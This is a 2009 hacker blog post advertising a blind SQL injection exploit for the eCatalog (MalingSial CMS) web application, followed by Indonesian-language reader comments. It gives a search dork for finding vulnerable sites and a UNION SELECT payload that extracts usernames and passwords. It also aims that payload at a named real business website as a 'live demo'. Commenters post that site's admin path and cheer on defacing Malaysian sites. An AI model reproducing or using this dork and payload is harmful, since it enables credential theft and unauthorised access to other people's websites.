eCatalog [MalingSial CMS] – Blind SQL Injection Vulnerability
————————————————————————————————————————————————————-
Author : YaDoY666
Contact : YaDoY666[a]ServerIsDown[dot]Org
Group : ServerIsDown
Date : September 27th, 2009
————————————————————————————————————————————————————-
[-] Dork
[+] “catalog/details.asp?id=” or use your own keyword
[-] Exploit
[+] details.asp?id=[id]+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user
[-] POC
http://127.0.0.1/catalog/details.asp?id=706+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user
[-] Demo Live
http://www.honourfurniture.com.my/catalog/details.asp?id=771+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user
[-] Greetz
Jack-, Don Tukuleso, XShadow, Kecemplungkalen, v3nom, indounderground, mistersaint, m3g4tr0n, gblack, miya666, ServerIsDown, Mainhack Brotherhood, Indonesian Coder, You.
- Proud To Be Indonesian -
[*] Cepet sembuh yah mi, Luph you always [*]
Share This Post
15 Comments
Sep 27, 200910:17
Hahahaha…
Silahkan Jack-
Sep 27, 200910:57
gagal pertamax
Oct 1, 200916:18
http://www.honourfurniture.com.my/catalog/admin/
hahaha tq gan
Oct 1, 200919:52
Yuuuk mareeee
Ratakan…!!!
Oct 3, 200917:40
ayo dong gan,,,,,,,, btw gan situs jasakom di hack ya………….
Oct 3, 200922:22
Apaan yg ayo?
jasakom di hack? dah di hack balik tuh… 
Oct 7, 200917:38
@ jojo : tapi di pojok kiri bawah transfer dari jatimcrew
mending jangan dibuka lagi , katanya bahaya ,,,,,
maaf so tau ,,,
Oct 17, 200917:11
Wahhh, mata jadi sakit nih liat warnanya,wkwkwkw
Oct 26, 200906:30
Salam Hormat suhu2 dan shifu2….
Oct 26, 200906:31
Salah nulis nama pulak…wakakakka…
Nov 20, 200918:36
mas…
nie hanya permintaan kecil saya dan newbie yang laen di seluruh nusantara…
gimana kalau website anda membuat artikel tentang semua artikel mengenai website yang sudah di hack….
khusus na website malaysia….
apa lagi sekarang lagi marak2 tapi informasi na hanya alamat website yang sudah dihack..
walaupun kami tidak bisa membantu dalam menghack website malaysia tapi kami butuh informasi tentang apa yang sudah dihack…
tolong ya mas yadoy666
Dec 9, 200917:07
..::HACKED BY CIUTEGIRL::..
Earth Under Attack :
thanks –>>>: HACKER NEWBIE..::(C1u7e G1rl)::..http://www.ciutegirl.comcontact us: ciutegirl@rocketmail.com
</DI
Jan 31, 201002:02
‘thanks buat tutorialnya
‘support buat dulur2 semua yg dah hack sites si MaLIng tukang nyokot budaya urang… Sori teu bisa bantu banyak.. Can bisa web sih ngan bisa VB hungkul T_T
Ajarin atuh a’
Feb 1, 201015:13
maknyus ene doy.. dapet banyak @_@
« Selamat Hari Raya Idul Fitri 1430H Next Post
Cracking Firefox Saved Password »
Blog RSS Feed
Follow Me on Twitter
10:16
PERTAMAX!!
Wow,.. keren doy :”>
saya suka dengan ini…
*BRB* SCAN
semoga tidak gagal pertamax